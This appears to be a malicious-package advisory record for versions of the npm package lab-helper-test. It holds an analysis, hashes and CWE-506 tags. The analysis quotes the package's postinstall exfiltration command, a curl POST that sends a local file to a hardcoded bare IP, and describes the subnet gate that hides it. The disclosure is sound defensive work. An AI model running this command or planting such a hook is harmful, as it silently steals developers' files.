-= Per source details. Do not edit below this line.=-
The package ships a postinstall lifecycle script (sec_check.js) that fires automatically on npm install. The script first checks whether the host has a non-internal IPv4 address beginning with 192. (a network-environment gate that hides the behavior from developer laptops and CI on other subnets), and if so executes curl -X POST http://18.175.63.47:8080/collect --data-binary "@${INIT_CWD}/myfile.txt" via child_process.execSync with stdio suppressed. This reads a file from the installer's working directory and ships it over plain HTTP to a hardcoded bare-IP attacker host with no consent and no error surfacing. The combination of automatic lifecycle execution, environment-gated activation, hardcoded bare-IP C2, and silent error handling is a textbook exfiltration dropper.
{
"malicious-packages-origins": [
{
"versions": [
"0.0.16"
],
"sha256": "650b9b18b0bc5101d5d948edf6bb841af88e20509a061dbbfe3fa21a8658b819",
"source": "amazon-inspector",
"modified_time": "2026-06-10T23:35:46Z",
"import_time": "2026-06-11T00:00:58.506202458Z",
"id": "IN-MAL-2026-005322"
},
{
"versions": [
"0.0.11"
],
"sha256": "9448c8cb290ff20cf707537035a6c383a4506b452c3ddc0e4c56bc398e02dbc7",
"modified_time": "2026-06-10T23:36:46Z",
"source": "amazon-inspector",
"import_time": "2026-06-11T00:00:58.699196382Z",
"id": "IN-MAL-2026-005324"
},
{
"versions": [
"0.0.15"
],
"sha256": "c15cab8e8dc86301754623991e2ae38130feb1a7b5d26e7a204ac2fbd918a166",
"source": "amazon-inspector",
"modified_time": "2026-06-10T23:36:56Z",
"import_time": "2026-06-11T00:00:58.797247524Z",
"id": "IN-MAL-2026-005325"
},
{
"versions": [
"0.0.2"
],
"sha256": "cef9ef58b6705aee11294b49f3e944e60b4047973a98378abc2f37e3dacd627b",
"modified_time": "2026-06-10T23:36:37Z",
"source": "amazon-inspector",
"import_time": "2026-06-11T00:00:58.593243686Z",
"id": "IN-MAL-2026-005323"
},
{
"versions": [
"0.0.5"
],
"sha256": "e12350df6e9a9d5a75f3796a6ebe9c08156ada9cbfd29acd480bf78fa51e61b9",
"source": "amazon-inspector",
"modified_time": "2026-06-10T23:37:03Z",
"import_time": "2026-06-11T00:00:58.956948473Z",
"id": "IN-MAL-2026-005326"
},
{
"versions": [
"0.0.3"
],
"sha256": "75adb75a0025882efbcde3ddd88882aaaedfd692425222eda99c148096f1f58a",
"modified_time": "2026-06-12T19:02:47Z",
"source": "amazon-inspector",
"import_time": "2026-06-12T19:43:37.50710346Z",
"id": "IN-MAL-2026-005827"
}
]
}{
"package_integrity": [
{
"filename": "lab-helper-test-0.0.16.tgz",
"hashes": {
"sha512_sri": "sha512-Avp3BR3qRNDjs+0GAO/nizPNvTvuY1JzD9gxGJ7JBprvx6vPaD+0bUSajv6JDQNCLchRgnkZmvk7DjU+mxd2Yg==",
"sha1": "9e35d4d7f0a16fe5ce57e81d1bd9a02918b9af5b"
}
}
],
"evidence_files": [
{
"sha256": "3ed6e162a46f00edce3bcaf365b5a9ac82d4c9e9c5a4c8efaa9622e68b1cafe7",
"path": "router_init.js",
"tlsh": "7201ef6ccf217988190054cb38eba92a846b03d4f4a468e54aed1ecb8675b5764fb8c8"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@thomlecter1122/lab-helper-test/MAL-2026-5534.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]